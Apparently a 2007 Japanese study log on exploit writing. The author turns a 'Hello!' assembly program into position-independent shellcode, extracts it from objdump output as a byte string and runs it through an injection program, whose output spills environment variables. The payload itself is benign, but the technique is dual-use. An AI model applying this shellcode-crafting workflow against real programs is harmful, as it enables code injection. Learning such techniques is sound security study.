2007-09-01 Exploiting MACは何系列?独立? ーーーーーー .code32 .data msg: .ascii "Hello!" .global main main: movl $4, %eax movl $0, %ebx movl $msg, %ecx movl $6, %edx int $0x80 movl $1, %eax int $0x80 ret ----- ----- .global main main: jmp ONE TWO: popl %ecx movb $0x4, %al xorl %ebx, %ebx movb $0x6, %dl int $0x80 xorl %eax, %eax inc %eax int $0x80 ret ONE: call TWO .string "Hello!" ----- これをコンパイル gcc hello.s 16進表示 defolos@glazheim:~$ objdump -d a.out a.out: ファイル形式 elf32-i386 セクション .init の逆アセンブル: 08048254 <_init>: 8048254: 55 push %ebp 8048255: 89 e5 mov %esp,%ebp 8048257: 83 ec 08 sub $0x8,%esp 804825a: e8 55 00 00 00 call 80482b4 804825f: e8 bc 00 00 00 call 8048320 8048264: e8 d7 01 00 00 call 8048440 <__do_global_ctors_aux> 8048269: c9 leave 804826a: c3 ret セクション .plt の逆アセンブル: 0804826c <.plt>: 804826c: ff 35 84 95 04 08 pushl 0x8049584 8048272: ff 25 88 95 04 08 jmp *0x8049588 8048278: 00 00 add %al,(%eax) 804827a: 00 00 add %al,(%eax) 804827c: ff 25 8c 95 04 08 jmp *0x804958c 8048282: 68 00 00 00 00 push $0x0 8048287: e9 e0 ff ff ff jmp 804826c <_init+0x18> セクション .text の逆アセンブル: 08048290 <_start>: 8048290: 31 ed xor %ebp,%ebp 8048292: 5e pop %esi 8048293: 89 e1 mov %esp,%ecx 8048295: 83 e4 f0 and $0xfffffff0,%esp 8048298: 50 push %eax 8048299: 54 push %esp 804829a: 52 push %edx 804829b: 68 e0 83 04 08 push $0x80483e0 80482a0: 68 80 83 04 08 push $0x8048380 80482a5: 51 push %ecx 80482a6: 56 push %esi 80482a7: 68 54 83 04 08 push $0x8048354 80482ac: e8 cb ff ff ff call 804827c <_init+0x28> 80482b1: f4 hlt 80482b2: 90 nop 80482b3: 90 nop 080482b4 : 80482b4: 55 push %ebp 80482b5: 89 e5 mov %esp,%ebp 80482b7: 53 push %ebx 80482b8: e8 00 00 00 00 call 80482bd 80482bd: 5b pop %ebx 80482be: 81 c3 c3 12 00 00 add $0x12c3,%ebx 80482c4: 50 push %eax 80482c5: 8b 83 10 00 00 00 mov 0x10(%ebx),%eax 80482cb: 85 c0 test %eax,%eax 80482cd: 74 02 je 80482d1 80482cf: ff d0 call *%eax 80482d1: 8b 5d fc mov 0xfffffffc(%ebp),%ebx 80482d4: c9 leave 80482d5: c3 ret 80482d6: 90 nop 80482d7: 90 nop 
80482d8: 90 nop 80482d9: 90 nop 80482da: 90 nop 80482db: 90 nop 80482dc: 90 nop 80482dd: 90 nop 80482de: 90 nop 80482df: 90 nop 080482e0 <__do_global_dtors_aux>: 80482e0: 55 push %ebp 80482e1: 89 e5 mov %esp,%ebp 80482e3: 83 ec 08 sub $0x8,%esp 80482e6: 80 3d 94 95 04 08 00 cmpb $0x0,0x8049594 80482ed: 75 2d jne 804831c <__do_global_dtors_aux+0x3c> 80482ef: a1 9c 94 04 08 mov 0x804949c,%eax 80482f4: 8b 10 mov (%eax),%edx 80482f6: 85 d2 test %edx,%edx 80482f8: 74 1b je 8048315 <__do_global_dtors_aux+0x35> 80482fa: 8d b6 00 00 00 00 lea 0x0(%esi),%esi 8048300: 83 c0 04 add $0x4,%eax 8048303: a3 9c 94 04 08 mov %eax,0x804949c 8048308: ff d2 call *%edx 804830a: a1 9c 94 04 08 mov 0x804949c,%eax 804830f: 8b 10 mov (%eax),%edx 8048311: 85 d2 test %edx,%edx 8048313: 75 eb jne 8048300 <__do_global_dtors_aux+0x20> 8048315: c6 05 94 95 04 08 01 movb $0x1,0x8049594 804831c: c9 leave 804831d: c3 ret 804831e: 89 f6 mov %esi,%esi 08048320 : 8048320: 55 push %ebp 8048321: 89 e5 mov %esp,%ebp 8048323: 83 ec 08 sub $0x8,%esp 8048326: a1 7c 95 04 08 mov 0x804957c,%eax 804832b: 85 c0 test %eax,%eax 804832d: 74 21 je 8048350 804832f: b8 00 00 00 00 mov $0x0,%eax 8048334: 85 c0 test %eax,%eax 8048336: 74 18 je 8048350 8048338: c7 04 24 7c 95 04 08 movl $0x804957c,(%esp) 804833f: e8 bc 7c fb f7 call 0 <_init-0x8048254> 8048344: 8d b6 00 00 00 00 lea 0x0(%esi),%esi 804834a: 8d bf 00 00 00 00 lea 0x0(%edi),%edi 8048350: 89 ec mov %ebp,%esp 8048352: 5d pop %ebp 8048353: c3 ret 08048354
: 8048354: eb 0f jmp 8048365 08048356 : 8048356: 59 pop %ecx 8048357: b0 04 mov $0x4,%al 8048359: 31 db xor %ebx,%ebx 804835b: b2 06 mov $0x6,%dl 804835d: cd 80 int $0x80 804835f: 31 c0 xor %eax,%eax 8048361: 40 inc %eax 8048362: cd 80 int $0x80 8048364: c3 ret 08048365 : 8048365: e8 ec ff ff ff call 8048356 804836a: 48 dec %eax 804836b: 65 gs 804836c: 6c insb (%dx),%es:(%edi) 804836d: 6c insb (%dx),%es:(%edi) 804836e: 6f outsl %ds:(%esi),(%dx) 804836f: 21 00 and %eax,(%eax) 8048371: 90 nop 8048372: 90 nop 8048373: 90 nop 8048374: 90 nop 8048375: 90 nop 8048376: 90 nop 8048377: 90 nop 8048378: 90 nop 8048379: 90 nop 804837a: 90 nop 804837b: 90 nop 804837c: 90 nop 804837d: 90 nop 804837e: 90 nop 804837f: 90 nop 08048380 <__libc_csu_init>: 8048380: 55 push %ebp 8048381: 89 e5 mov %esp,%ebp 8048383: 57 push %edi 8048384: 56 push %esi 8048385: 31 f6 xor %esi,%esi 8048387: 53 push %ebx 8048388: 83 ec 0c sub $0xc,%esp 804838b: e8 a0 00 00 00 call 8048430 <__i686.get_pc_thunk.bx> 8048390: 81 c3 f0 11 00 00 add $0x11f0,%ebx 8048396: e8 b9 fe ff ff call 8048254 <_init> 804839b: 8d 93 14 ff ff ff lea 0xffffff14(%ebx),%edx 80483a1: 8d 83 14 ff ff ff lea 0xffffff14(%ebx),%eax 80483a7: 29 c2 sub %eax,%edx 80483a9: c1 fa 02 sar $0x2,%edx 80483ac: 39 d6 cmp %edx,%esi 80483ae: 73 1c jae 80483cc <__libc_csu_init+0x4c> 80483b0: 89 d7 mov %edx,%edi 80483b2: 8d b4 26 00 00 00 00 lea 0x0(%esi),%esi 80483b9: 8d bc 27 00 00 00 00 lea 0x0(%edi),%edi 80483c0: ff 94 b3 14 ff ff ff call *0xffffff14(%ebx,%esi,4) 80483c7: 46 inc %esi 80483c8: 39 fe cmp %edi,%esi 80483ca: 72 f4 jb 80483c0 <__libc_csu_init+0x40> 80483cc: 83 c4 0c add $0xc,%esp 80483cf: 5b pop %ebx 80483d0: 5e pop %esi 80483d1: 5f pop %edi 80483d2: 5d pop %ebp 80483d3: c3 ret 80483d4: 8d b6 00 00 00 00 lea 0x0(%esi),%esi 80483da: 8d bf 00 00 00 00 lea 0x0(%edi),%edi 080483e0 <__libc_csu_fini>: 80483e0: 55 push %ebp 80483e1: 89 e5 mov %esp,%ebp 80483e3: 83 ec 08 sub $0x8,%esp 80483e6: 89 1c 24 mov %ebx,(%esp) 80483e9: e8 42 00 00 
00 call 8048430 <__i686.get_pc_thunk.bx> 80483ee: 81 c3 92 11 00 00 add $0x1192,%ebx 80483f4: 89 74 24 04 mov %esi,0x4(%esp) 80483f8: 8d 83 14 ff ff ff lea 0xffffff14(%ebx),%eax 80483fe: 8d 93 14 ff ff ff lea 0xffffff14(%ebx),%edx 8048404: 29 d0 sub %edx,%eax 8048406: c1 f8 02 sar $0x2,%eax 8048409: 85 c0 test %eax,%eax 804840b: 8d 70 ff lea 0xffffffff(%eax),%esi 804840e: 75 10 jne 8048420 <__libc_csu_fini+0x40> 8048410: e8 5b 00 00 00 call 8048470 <_fini> 8048415: 8b 1c 24 mov (%esp),%ebx 8048418: 8b 74 24 04 mov 0x4(%esp),%esi 804841c: 89 ec mov %ebp,%esp 804841e: 5d pop %ebp 804841f: c3 ret 8048420: ff 94 b3 14 ff ff ff call *0xffffff14(%ebx,%esi,4) 8048427: 89 f0 mov %esi,%eax 8048429: 4e dec %esi 804842a: 85 c0 test %eax,%eax 804842c: 75 f2 jne 8048420 <__libc_csu_fini+0x40> 804842e: eb e0 jmp 8048410 <__libc_csu_fini+0x30> 08048430 <__i686.get_pc_thunk.bx>: 8048430: 8b 1c 24 mov (%esp),%ebx 8048433: c3 ret 8048434: 90 nop 8048435: 90 nop 8048436: 90 nop 8048437: 90 nop 8048438: 90 nop 8048439: 90 nop 804843a: 90 nop 804843b: 90 nop 804843c: 90 nop 804843d: 90 nop 804843e: 90 nop 804843f: 90 nop 08048440 <__do_global_ctors_aux>: 8048440: 55 push %ebp 8048441: 89 e5 mov %esp,%ebp 8048443: 53 push %ebx 8048444: 83 ec 04 sub $0x4,%esp 8048447: bb 6c 95 04 08 mov $0x804956c,%ebx 804844c: a1 6c 95 04 08 mov 0x804956c,%eax 8048451: 83 f8 ff cmp $0xffffffff,%eax 8048454: 74 16 je 804846c <__do_global_ctors_aux+0x2c> 8048456: 8d 76 00 lea 0x0(%esi),%esi 8048459: 8d bc 27 00 00 00 00 lea 0x0(%edi),%edi 8048460: 83 eb 04 sub $0x4,%ebx 8048463: ff d0 call *%eax 8048465: 8b 03 mov (%ebx),%eax 8048467: 83 f8 ff cmp $0xffffffff,%eax 804846a: 75 f4 jne 8048460 <__do_global_ctors_aux+0x20> 804846c: 58 pop %eax 804846d: 5b pop %ebx 804846e: 5d pop %ebp 804846f: c3 ret セクション .fini の逆アセンブル: 08048470 <_fini>: 8048470: 55 push %ebp 8048471: 89 e5 mov %esp,%ebp 8048473: 53 push %ebx 8048474: e8 00 00 00 00 call 8048479 <_fini+0x9> 8048479: 5b pop %ebx 804847a: 81 c3 07 11 00 00 add 
$0x1107,%ebx 8048480: 52 push %edx 8048481: e8 5a fe ff ff call 80482e0 <__do_global_dtors_aux> 8048486: 8b 5d fc mov 0xfffffffc(%ebp),%ebx 8048489: c9 leave 804848a: c3 ret defolos@glazheim:~$ 必要なのはmainのところから90が連発する所までの間 08048354
: 8048354: eb 0f jmp 8048365 08048356 : 8048356: 59 pop %ecx 8048357: b0 04 mov $0x4,%al 8048359: 31 db xor %ebx,%ebx 804835b: b2 06 mov $0x6,%dl 804835d: cd 80 int $0x80 804835f: 31 c0 xor %eax,%eax 8048361: 40 inc %eax 8048362: cd 80 int $0x80 8048364: c3 ret 08048365 : 8048365: e8 ec ff ff ff call 8048356 804836a: 48 dec %eax 804836b: 65 gs 804836c: 6c insb (%dx),%es:(%edi) 804836d: 6c insb (%dx),%es:(%edi) 804836e: 6f outsl %ds:(%esi),(%dx) 804836f: 21 00 and %eax,(%eax) 8048371: 90 nop 8048372: 90 nop 8048373: 90 nop 8048374: 90 nop 8048375: 90 nop いらない部分を消す eb 0f 59 b0 04 31 db b2 06 cd 80 31 c0 40 cd 80 c3 e8 ec ff ff ff 48 65 6c 6c 6f 21 これを挿入ベクター生成プログラムにセットする "\xeb\x0f\x59\xb0\x04\x31\xdb\xb2\x06\xcd\x80\x31\xc0\x40\xcd\x80\xc3\xe8\xec\xff\xff\xff\x48\x65\x6c\x6c\x6f\x21" 実行するとヘローの他に defolos@glazheim:~$ ./exploit.exe Hello!8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uf
fff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffffSSH_AGENT_PID=3140TERM=xtermDESKTOP_STARTUP_ID=SHELL=/bin/bashJLESSCHARSET=japanese-eucGTK_RC_FILES=/etc/gtk/gtkrc:/home/defolos/.gtkrc-1.2-gnome2WINDOWID=37748805USER=defolosLS_COLORS=no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.gz=01;31:*.bz2=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.jpg=01;35:*.jpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.avi=01;35:*.fli=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.ogg=01;35:*.mp3=01;35:*.wav=01;35:GNOME_KEYRING_SOCKET=/tmp/keyring-l5KwAs/socketSSH_AUTH_SOCK=/tmp/ssh-fBcwvc3092/agent.3092SESSION_MANAGER=local/glazheim:/tmp/.ICE-unix/3092USERNAME=defolosPAGER=lvPATH=/home/defolos/bin:/usr/local/bin:/usr/bin:/bin:/usr/bin/X11:/usr/gamesDESKTOP_SESSION=defaultGDM_XSERVER_LOCATION=localPWD=/home/defolosXMODIFIERS=@im=kinput2EDITOR=viLANG=ja_JP.eucJPGDMSESSION=defaultSHLVL=1HOME=/home/defolosLANGUAGE=ja_JP:ja:en_GB:enGNOME_DESKTOP_SESSION_ID=DefaultLV=-OejLESS=-MLOGNAME=defolosLESSOPEN=| /usr/bin/lesspipe '%s'DISPLAY=:0.0LESSCLOSE=/usr/bin/lesspipe '%s' '%s'COLORTERM=gnome-terminalXAUTHORITY=/home/defolos/.Xauthority_=./exdefolos@glazheim:~$ ■考察 
もっと時間に余裕を持たせるべき。unistd.hの場所が変わっている、あるいはそもそも存在しない。